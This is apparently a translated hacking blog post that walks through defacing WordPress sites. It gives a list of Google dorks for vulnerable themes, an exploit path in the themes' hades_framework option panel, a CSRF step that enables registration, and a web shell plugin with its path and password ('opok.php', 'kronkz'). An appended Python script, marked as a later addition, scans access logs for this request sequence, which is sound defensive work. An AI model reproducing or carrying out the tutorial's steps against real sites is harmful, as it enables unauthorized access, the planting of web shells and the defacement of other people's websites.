Deface using the ADD ADMIN WORDPRESS method, 2018
Hello bro, it's been a long time since I shared anything on this blog. Tonight I want to share how to deface using WordPress add admin.
No need for a lot of talk, just get the materials ready.
+++++++++++++++++++++++++++++++++++++++++++++++++++
The materials:
1) The dorks:
- inurl:/wp-content/themes/appius/
- inurl:/wp-content/themes/Consultant/
- inurl:/wp-content/themes/appius1/
- inurl:/wp-content/themes/archin/
- inurl:/wp-content/themes/averin/
- inurl:/wp-content/themes/dagda/
- inurl:/wp-content/themes/echea/
- inurl:/wp-content/themes/felici/
- inurl:/wp-content/themes/GantiDengantema/
- inurl:/wp-content/themes/kmp/
- inurl:/wp-content/themes/kmp2/
- inurl:/wp-content/themes/themanya/
- inurl:/wp-content/themes/liberal/
- inurl:/wp-content/themes/liberal-media-bias/
- inurl:/wp-content/themes/linguini/
- inurl:/wp-content/themes/livewire/
- inurl:/wp-content/themes/majestics/
- inurl:/wp-content/themes/mathis/
- inurl:/wp-content/themes/mazine/
- inurl:/wp-content/themes/Orchestra/
- inurl:/wp-content/themes/shopsum/
- inurl:/wp-content/themes/shotzz/
- and many more vulnerable themes. Read more: http://www.mas-tah.com/2017/08/deface-dengan-teknik-add-admin-wp.html
2) Then download the plugin used to upload the shell; you can download it HERE
3) The exploit: /hades_framework/option_panel/ajax.php
Example: site.com/wp-content/themes/namatemanya/hades_framework/option_panel/ajax.php
4) The CSRF exploit: download it HERE
+++++++++++++++++++++++++++++++++++++++++++++++++++
Straight to the practice.
First, search Google with the dorks above,
then pick one of the sites.
If it comes up blank, that means it's vulnerable and ready to go.
OK, open the CSRF exploit with Notepad or whatever free editor you have.
Change the part I highlighted to your site, then also change the username and email, then
save it and open it in your browser.
Then click submit.
The result will look like this:
See, there's the text SUCCESS.
Then go to the registration page at site.com/wp-login.php?action=register or site.com/(dirnya)/wp-login.php?action=register
like below.
Enter your username and email, open your email and wait for the verification, then log in. After that just upload the plugin, and call the shell at site.com/wp-content/plugins/dark-mode/opok.php, password: kronkz
Then just execute, bro. OK, that's all from me. If any of the wording is hard to understand, you can ask me directly on IG or by email.
IG : @mrkronkz
email : woyname@gmail.com
That's all, and thank you.
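For site owners checking whether this sequence was run against them, here is an added example (not part of the original post) that scans web server access logs for the three requests described above, in order, from the same client: the theme's `hades_framework/option_panel/ajax.php`, the registration page, and a PHP file requested directly inside a plugin directory. The log lines are constructed, and the `example-theme` name, IP addresses and Combined Log Format layout are assumptions.

```python
import re
from collections import defaultdict

# Combined Log Format prefix: ip ident user [time] "METHOD path PROTO" status
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# The three request stages the post walks through, in order.
STAGES = [
    ("option_panel", re.compile(
        r"/wp-content/themes/[^/]+/hades_framework/option_panel/ajax\.php", re.I)),
    ("register", re.compile(r"/wp-login\.php\?(?:[^#]*&)?action=register", re.I)),
    # Any PHP file requested directly inside a plugin directory.
    ("plugin_php", re.compile(r"/wp-content/plugins/[^/]+/[^/?]+\.php", re.I)),
]

def find_chains(lines):
    """Map client IP -> ordered stages reached, for IPs that touched the option panel."""
    reached = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        ip, _method, path, _status = m.groups()
        nxt = len(reached[ip])  # index of the next stage expected from this IP
        if nxt < len(STAGES) and STAGES[nxt][1].search(path):
            reached[ip].append(STAGES[nxt][0])
    return {ip: stages for ip, stages in reached.items() if stages}

def full_chains(lines):
    """IPs that completed all three stages: treat the site as compromised."""
    return sorted(ip for ip, s in find_chains(lines).items() if len(s) == len(STAGES))

# Constructed sample log (documentation IP ranges, placeholder theme name).
T = "[12/Mar/2018:21:04:10 +0000]"
AJAX = "/wp-content/themes/example-theme/hades_framework/option_panel/ajax.php"
SAMPLE_LOG = [
    f'203.0.113.7 - - {T} "GET {AJAX} HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    f'198.51.100.20 - - {T} "GET /wp-login.php?action=register HTTP/1.1" 200 2870',
    f'203.0.113.7 - - {T} "POST {AJAX} HTTP/1.1" 200 7 "-" "Mozilla/5.0"',
    f'203.0.113.7 - - {T} "GET /wp-login.php?action=register HTTP/1.1" 200 2870',
    f'203.0.113.7 - - {T} "POST /wp-content/plugins/dark-mode/opok.php HTTP/1.1" 200 512',
    f'192.0.2.50 - - {T} "GET {AJAX} HTTP/1.1" 404 0 "-" "curl/7.58"',
]

if __name__ == "__main__":
    for ip, stages in find_chains(SAMPLE_LOG).items():
        print(ip, " -> ".join(stages))
```

An IP that reaches only `option_panel` is a probe; one that reaches all three warrants auditing the administrator accounts, the registration settings and the installed plugins, and removing or updating the affected theme.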